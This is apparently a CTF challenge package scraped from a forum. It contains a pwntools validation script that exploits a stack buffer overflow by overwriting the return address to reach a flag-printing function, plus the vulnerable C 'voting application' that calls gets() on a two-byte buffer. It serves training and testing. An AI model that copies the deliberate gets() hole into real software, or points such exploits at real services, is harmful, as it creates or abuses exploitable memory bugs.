#This challenge is based on a simple BOF that occurs in gets(input) which later *can* redirect code execution
from pwn import *
import time
def main(ip, port, flag):
try:
r = remote(ip, port)
r.sendline("A"*10 + "\x07\x08\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") #0000000000400807
#we pad with 10 A's then inject the address in code which we want to redirect code to.
#In this case super_secret_function
response = b""
time.sleep(4)
response += r.recv()
print("Response: " + str(response))
if flag in str(response):
print("Correct")
exit(0)
else:
print("Incorrect")
exit(1)
except Exception as e:
print("fail due to ")
print(e)
exit(1)
#Validation section
flag = input("Flag: ").replace("\n", "")
ip, port = input("service: ").split(":")
main(str(ip), int(port), str(flag))
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <unistd.h>
#include <signal.h>
void super_secret_function(){
FILE *f;
char c;
f = fopen("/home/ctf/flag.txt", "r");
if(f == NULL){
printf("Cannot open flag.txt\n");
exit(1);
}
c = fgetc(f);
while(c != EOF){
printf ("%c", c);
c = fgetc(f);
}
fclose(f);
exit(0);
}
void sig(int sign){
exit(0);
}
int main(){
signal(SIGALRM, sig);
alarm(40);
char input[2];
printf("Hello and welcome to \e[3mour\e[23m voting application!\n");
printf("Today's vote will be regarding the administration of\n");
printf("watevr CTF.\n");
printf("the voting range is 0 to 10. 0 being the worst possible and 10 being the best possible.\n");
printf("Thanks!\n");
printf("Vote: ");
fflush(stdout);
gets(input);
printf("Thanks for voting!\n");
return 0;
}
| 
发表于 2020-5-1 19:16:06
|
查看: 1823|
回复: 0
窥视卡
雷达卡
提升卡
置顶卡
关闭卡
开启卡
变色卡
千斤顶
照妖镜